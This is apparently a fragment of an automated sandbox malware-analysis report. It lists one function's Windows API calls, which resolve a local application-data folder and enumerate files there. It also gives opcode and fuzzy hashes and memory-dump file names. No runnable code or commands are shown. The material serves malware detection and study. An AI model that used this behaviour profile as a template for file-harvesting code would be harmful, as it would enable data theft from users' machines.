                  • Instruction ID: 62ee3bb05f7e69cc759afc463822ddfcb685c063514583a16755a61919cddb44
                  • Opcode Fuzzy Hash: 8042fcf350f566052d202cefd46b382687e1b15489caf565bfd67f01ec594e6a
                  • Instruction Fuzzy Hash: 16F06D329047009BD7A1BFB89807B9933A3AF00720F20614DF904B62D2CB6459419FDE
                  Function 00634F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00634F7A
                  • lstrcat.KERNEL32(?,00641070), ref: 00634F97
                  • lstrcat.KERNEL32(?,01318F40), ref: 00634FAB
                  • lstrcat.KERNEL32(?,00641074), ref: 00634FBD
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 0063492C
                    • Part of subcall function 00634910: FindFirstFileA.KERNEL32(?,?), ref: 00634943
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FDC), ref: 00634971
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FE0), ref: 00634987
                    • Part of subcall function 00634910: FindNextFileA.KERNEL32(000000FF,?), ref: 00634B7D
                    • Part of subcall function 00634910: FindClose.KERNEL32(000000FF), ref: 00634B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: aa85c8711c937b3b685d7f8a8ac3aa2a07ab9000bf585b8c8284153754dec734
                  • Instruction ID: 9f482866ae096840fd45695dd3e480225b00cf835e0c2ffb15cdeba38eafb2e0
                  • Opcode Fuzzy Hash: aa85c8711c937b3b685d7f8a8ac3aa2a07ab9000bf585b8c8284153754dec734
                  • Instruction Fuzzy Hash: E321B8B69002046BC794F7B0EC46EED733DBB54700F014558F65AA7181EEB596C88FD6